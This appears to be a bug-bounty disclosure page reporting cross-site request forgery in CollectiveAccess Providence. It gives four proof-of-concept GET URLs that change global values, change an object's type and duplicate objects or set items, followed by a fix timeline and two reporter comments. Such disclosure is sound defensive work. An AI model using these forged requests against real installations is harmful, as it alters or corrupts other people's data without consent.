Cross-Site Request Forgery (CSRF) in collectiveaccess/providence

Valid

Reported on

Sep 26th 2021


Description

I have found more endpoints which allow edit/duplicate were not protected from CSRF, the following endpoints are:

1: Edit Global Value in Pawtucket.

2: Change object type.

3: Duplicate object.

4: Duplicate items in the set and add to another set.

Proof of Concept

Via GET requests:
1. http://[URL]/providence/index.php/manage/Pawtucket/saveGlobalValues?_formName=globalValuesForm&form_timestamp=1632635941&hours_of_operation=ABC

2. http://[URL]/providence/index.php/editor/objects/ObjectEditor/ChangeType?_formName=caChangeTypeForm&form_timestamp=1632633565&type_id=23&object_id=7

3. http://[URL]/providence/index.php/editor/objects/ObjectEditor/Edit?_formName=DuplicateItemForm&object_id=34&mode=dupe

4. http://[URL]/providence/index.php/manage/sets/SetEditor/DuplicateItems?_formName=caDupeSetItemsForm&form_timestamp=1632634975&setForDupes=new&set_id=2

Impact

Compromise on the integrity and availability of objects.

Occurences

For 3. Duplicate objects/sets

For 4. Duplicate Items in sets

For 1. Edit Global Value in Pawtucket

For 2. Change Type of Object

We have contacted a member of the collectiveaccess/providence team and are waiting to hear back 2 months ago
CollectiveAccess validated this vulnerability 2 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
CollectiveAccess confirmed that a fix has been merged on 23bb11 2 months ago
CollectiveAccess has been awarded the fix bounty
displayHelpers.php#L1207 has been validated
displayHelpers.php#L1514 has been validated
change_type_html.php#L58 has been validated
Musio
2 months ago

It is very interesting that you invalidated my reports but accepted this one !! :|

amammad
2 months ago

@admin and @maintainer really Why this is happen ??